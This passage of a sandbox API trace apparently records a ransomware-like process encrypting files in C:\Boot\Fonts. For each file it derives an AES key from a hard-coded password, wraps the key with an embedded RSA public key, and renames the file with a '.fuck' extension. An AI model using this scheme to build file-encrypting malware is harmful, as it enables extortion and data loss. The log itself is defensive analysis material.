out: lpSystemTimeAsFileTime=0x2c5f40c) [0126.960] GetLastError () returned 0x5 [0126.960] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\malgun_boot.ttf" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf")) returned 0x20 [0126.963] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\malgun_boot.ttf", dwFileAttributes=0x80) returned 0 [0126.963] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\malgun_boot.ttf" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.963] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\malgun_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0126.963] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\malgun_boot.ttf.gsg", dwFileAttributes=0x2) returned 1 [0126.964] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27ed4c0) returned 1 [0126.965] CryptCreateHash (in: hProv=0x27ed4c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0126.965] lstrlenA (lpString="miyiMmnMTcbAzXSmrboOmHkozMlQm") returned 29 [0126.965] CryptHashData (hHash=0x69d368, pbData=0x5bcf98, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0126.965] CryptDeriveKey (in: hProv=0x27ed4c0, Algid=0x6610, hBaseData=0x69d368, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d428) returned 1 [0126.966] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.966] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0126.966] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27ec998) returned 1 [0126.966] CryptImportPublicKeyInfo (in: hCryptProv=0x27ec998, dwCertEncodingType=0x1, pInfo=0x27da928*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27da958*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27da960*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69db28) returned 1 [0126.966] CryptEncrypt (in: hKey=0x69db28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0126.966] CryptEncrypt (in: hKey=0x69db28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ecaa8*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27ecaa8*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0126.966] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27ecaa8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27ecaa8*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0126.967] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27f6a78, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27f6a78, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0126.967] CryptEncrypt (in: hKey=0x69d428, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27f6a78*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27f6a78*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0126.967] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27f6a78*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27f6a78*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0126.967] CloseHandle (hObject=0xffffffff) returned 1 [0126.967] CloseHandle (hObject=0x5cd8) returned 1 [0126.968] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\malgun_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\malgun_boot.ttf" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf"), bFailIfExists=0) returned 0 [0126.971] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\malgun_boot.ttf", dwFileAttributes=0x0) returned 0 [0126.972] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\malgun_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf.gsg")) returned 1 [0126.972] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\malgun_boot.ttf" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\malgun_boot.ttf.fuck" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf.fuck")) returned 0 [0126.973] CryptDestroyHash (hHash=0x69d368) returned 1 [0126.973] CryptDestroyKey (hKey=0x69d428) returned 1 [0126.973] CryptReleaseContext (hProv=0x27ed4c0, dwFlags=0x0) returned 1 [0126.973] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.973] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0126.973] GetLastError () returned 0x5 [0126.973] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf")) returned 0x20 [0126.973] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\meiryon_boot.ttf", dwFileAttributes=0x80) returned 0 [0126.973] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.973] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\meiryon_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0126.974] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\meiryon_boot.ttf.gsg", dwFileAttributes=0x2) returned 1 [0126.974] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27ed328) returned 1 [0126.976] CryptCreateHash (in: hProv=0x27ed328, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0126.976] lstrlenA (lpString="miyiMmnMTcbAzXSmrboOmHkozMlQm") returned 29 [0126.976] CryptHashData (hHash=0x69d428, pbData=0x5bcf98, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0126.976] CryptDeriveKey (in: hProv=0x27ed328, Algid=0x6610, hBaseData=0x69d428, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d6e8) returned 1 [0126.976] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.976] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0126.976] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27ecbb8) returned 1 [0126.976] CryptImportPublicKeyInfo (in: hCryptProv=0x27ecbb8, dwCertEncodingType=0x1, pInfo=0x27da2a8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27da2d8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27da2e0*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69e028) returned 1 [0126.976] CryptEncrypt (in: hKey=0x69e028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0126.976] CryptEncrypt (in: hKey=0x69e028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ecc40*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27ecc40*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0126.976] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27ecc40*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27ecc40*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0126.977] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27f6a78, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27f6a78, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0126.977] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27f6a78*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27f6a78*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0126.977] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27f6a78*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27f6a78*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0126.977] CloseHandle (hObject=0xffffffff) returned 1 [0126.977] CloseHandle (hObject=0x5cd8) returned 1 [0126.978] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\meiryon_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf"), bFailIfExists=0) returned 0 [0126.981] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\meiryon_boot.ttf", dwFileAttributes=0x0) returned 0 [0126.981] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\meiryon_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf.gsg")) returned 1 [0126.982] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\meiryon_boot.ttf.fuck" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf.fuck")) returned 0 [0126.982] CryptDestroyHash (hHash=0x69d428) returned 1 [0126.982] CryptDestroyKey (hKey=0x69d6e8) returned 1 [0126.982] CryptReleaseContext (hProv=0x27ed328, dwFlags=0x0) returned 1 [0126.983] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.983] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0126.983] GetLastError () returned 0x5 [0126.983] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf")) returned 0x20 [0126.984] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\meiryo_boot.ttf", dwFileAttributes=0x80) returned 0 [0126.984] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.984] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\meiryo_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0126.985] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\meiryo_boot.ttf.gsg", dwFileAttributes=0x2) returned 1 [0126.985] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27eccc8) returned 1 [0126.986] CryptCreateHash (in: hProv=0x27eccc8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0126.987] lstrlenA (lpString="miyiMmnMTcbAzXSmrboOmHkozMlQm") returned 29 [0126.987] CryptHashData (hHash=0x69d368, pbData=0x5bcf70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0126.987] CryptDeriveKey (in: hProv=0x27eccc8, Algid=0x6610, hBaseData=0x69d368, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d6e8) returned 1 [0126.987] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.987] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0126.987] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27ecee8) returned 1 [0126.987] CryptImportPublicKeyInfo (in: hCryptProv=0x27ecee8, dwCertEncodingType=0x1, pInfo=0x27dafa8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27dafd8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27dafe0*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69de68) returned 1 [0126.987] CryptEncrypt (in: hKey=0x69de68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0126.987] CryptEncrypt (in: hKey=0x69de68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ed328*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27ed328*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0126.988] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27ed328*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27ed328*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0126.988] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27faa88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27faa88, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0126.988] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27faa88*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27faa88*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0126.988] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27faa88*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27faa88*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0126.988] CloseHandle (hObject=0xffffffff) returned 1 [0126.988] CloseHandle (hObject=0x5cd8) returned 1 [0126.989] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\meiryo_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf"), bFailIfExists=0) returned 0 [0126.992] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\meiryo_boot.ttf", dwFileAttributes=0x0) returned 0 [0126.993] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\meiryo_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf.gsg")) returned 1 [0126.993] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\meiryo_boot.ttf.fuck" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf.fuck")) returned 0 [0126.994] CryptDestroyHash (hHash=0x69d368) returned 1 [0126.994] CryptDestroyKey (hKey=0x69d6e8) returned 1 [0126.994] CryptReleaseContext (hProv=0x27eccc8, dwFlags=0x0) returned 1 [0126.994] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.994] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0126.994] GetLastError () returned 0x5 [0126.994] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msjhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf")) returned 0x20 [0126.994] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msjhn_boot.ttf", dwFileAttributes=0x80) returned 0 [0126.994] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\msjhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.994] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\msjhn_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0126.995] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msjhn_boot.ttf.gsg", dwFileAttributes=0x2) returned 1 [0126.995] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27eccc8) returned 1 [0126.997] CryptCreateHash (in: hProv=0x27eccc8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0126.997] lstrlenA (lpString="miyiMmnMTcbAzXSmrboOmHkozMlQm") returned 29 [0126.997] CryptHashData (hHash=0x69d368, pbData=0x5bcf98, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0126.997] CryptDeriveKey (in: hProv=0x27eccc8, Algid=0x6610, hBaseData=0x69d368, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d428) returned 1 [0126.997] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.997] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0126.997] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27ecd50) returned 1 [0126.997] CryptImportPublicKeyInfo (in: hCryptProv=0x27ecd50, dwCertEncodingType=0x1, pInfo=0x27db898*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27db8c8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27db8d0*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69e168) returned 1 [0126.997] CryptEncrypt (in: hKey=0x69e168, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0126.997] CryptEncrypt (in: hKey=0x69e168, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ed4c0*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27ed4c0*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0126.997] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27ed4c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27ed4c0*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0126.998] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27faa88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27faa88, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0126.998] CryptEncrypt (in: hKey=0x69d428, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27faa88*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27faa88*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0126.998] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27faa88*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27faa88*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0126.998] CloseHandle (hObject=0xffffffff) returned 1 [0126.998] CloseHandle (hObject=0x5cd8) returned 1 [0126.999] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\msjhn_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\msjhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf"), bFailIfExists=0) returned 0 [0127.002] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msjhn_boot.ttf", dwFileAttributes=0x0) returned 0 [0127.002] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\msjhn_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf.gsg")) returned 1 [0127.003] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\msjhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\msjhn_boot.ttf.fuck" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf.fuck")) returned 0 [0127.004] CryptDestroyHash (hHash=0x69d368) returned 1 [0127.004] CryptDestroyKey (hKey=0x69d428) returned 1 [0127.004] CryptReleaseContext (hProv=0x27eccc8, dwFlags=0x0) returned 1 [0127.004] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0127.004] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0127.004] GetLastError () returned 0x5 [0127.004] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msjh_boot.ttf" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf")) returned 0x20 [0127.004] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msjh_boot.ttf", dwFileAttributes=0x80) returned 0 [0127.004] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\msjh_boot.ttf" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0127.004] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\msjh_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0127.005] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msjh_boot.ttf.gsg", dwFileAttributes=0x2) returned 